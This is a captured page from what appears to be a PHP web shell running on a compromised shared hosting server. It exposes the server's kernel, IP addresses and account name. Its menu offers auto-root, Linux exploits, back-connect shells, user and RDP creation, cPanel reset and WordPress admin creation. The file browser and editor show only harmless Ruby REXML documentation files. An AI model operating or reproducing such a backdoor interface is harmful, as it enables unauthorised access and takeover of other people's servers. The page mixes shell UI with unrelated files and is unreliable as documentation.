Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
REXML /
Source /
[ HOME SHELL ]
Name
Size
Permission
Action
cdesc-Source.yaml
1.27
KB
-rw-r--r--
consume-i.yaml
184
B
-rw-r--r--
current_line-i.yaml
262
B
-rw-r--r--
empty%3f-i.yaml
251
B
-rw-r--r--
encoding%3d-i.yaml
286
B
-rw-r--r--
match-i.yaml
190
B
-rw-r--r--
match_to-i.yaml
192
B
-rw-r--r--
match_to_consume-i.yaml
208
B
-rw-r--r--
new-c.yaml
406
B
-rw-r--r--
position-i.yaml
177
B
-rw-r--r--
read-i.yaml
169
B
-rw-r--r--
scan-i.yaml
1.1
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : scan-i.yaml
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Scans the source for a given pattern. Note, that this is not your usual scan() method. For one thing, the pattern argument has some requirements; for another, the source can be consumed. You can easily confuse this method. Originally, the patterns were easier to construct and this method more robust, because this method generated search regexes on the fly; however, this was computationally expensive and slowed down the entire REXML package considerably, since this is by far the most commonly called method. @param pattern must be a Regexp, and must be in the form of /^\s*(#{your pattern, with no groups})(.*)/. The first group will be returned; the second group is used if the consume flag is set. @param consume if true, the pattern returned will be consumed, leaving everything after it in the Source. @return the pattern, if found, or nil if the Source is empty or the pattern is not found. full_name: REXML::Source#scan is_singleton: false name: scan params: (pattern, cons=false) visibility: public
Close